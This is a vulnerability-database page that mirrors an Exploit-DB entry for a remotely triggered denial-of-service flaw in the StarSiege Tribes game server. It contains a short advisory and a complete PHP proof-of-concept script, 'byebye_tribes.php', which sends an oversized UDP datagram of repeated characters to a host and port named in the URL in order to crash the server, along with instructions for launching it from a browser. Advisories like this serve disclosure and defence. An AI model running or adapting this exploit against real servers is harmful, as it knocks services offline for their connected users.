StarSiege Tribes Server - Denial of Service (2)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1054031 漏洞类型
发布时间 2003-07-14 更新时间 2003-07-14
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/22900
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/8184/info
 
StarSiege Tribes Game Server has been reported prone to a remotely triggered denial of service vulnerability.
 
The issue presents itself when the affected server receives and processes a malformed UDP datagram. Reportedly when the server handles a UDP datagram containing malformed data, an exception will be thrown and the StarSiege Tribes Game Server will crash. Service will be denied, to current connected users of the system.

<?php
/* 
Author: st0ic <st0ic@fsix.net>
Website: http://www.fsix.net/
Name: byebye_tribes.php
Original Date: 07/14/2003
Purpose: POC "StarSiege: Tribes" DoS

Usage: Call it from a browser once its uploaded on a server
with PHP installed:

http://host/byebye_tribes.php?host=127.0.0.1&port=28001

Note - global variables must be enabled in php.ini (yes... I 
know thats bad too)

Stuff:
Yeah... too lazy to fine tune it, maybe someone else can
throw in HTML forms to give it a little interface ;-).
*/

$fp = fsockopen("udp://$host", $port, $errno, $errstr, 30);
if (!$fp) 
{
	echo "$errstr ($errno)<br>\n";
	exit;
}
else
{
	$char = "a";
	for($a = 0; $a < 255; $a++)
		$data = $data.$char;

	if(fputs ($fp, $data) )
		echo "successful<br>";
	else
		echo "error<br>";
}
?>